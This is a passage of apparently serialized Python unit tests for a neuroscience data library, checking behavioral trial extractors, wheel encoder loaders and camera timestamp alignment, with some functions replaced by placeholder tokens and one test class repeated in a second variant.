np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n 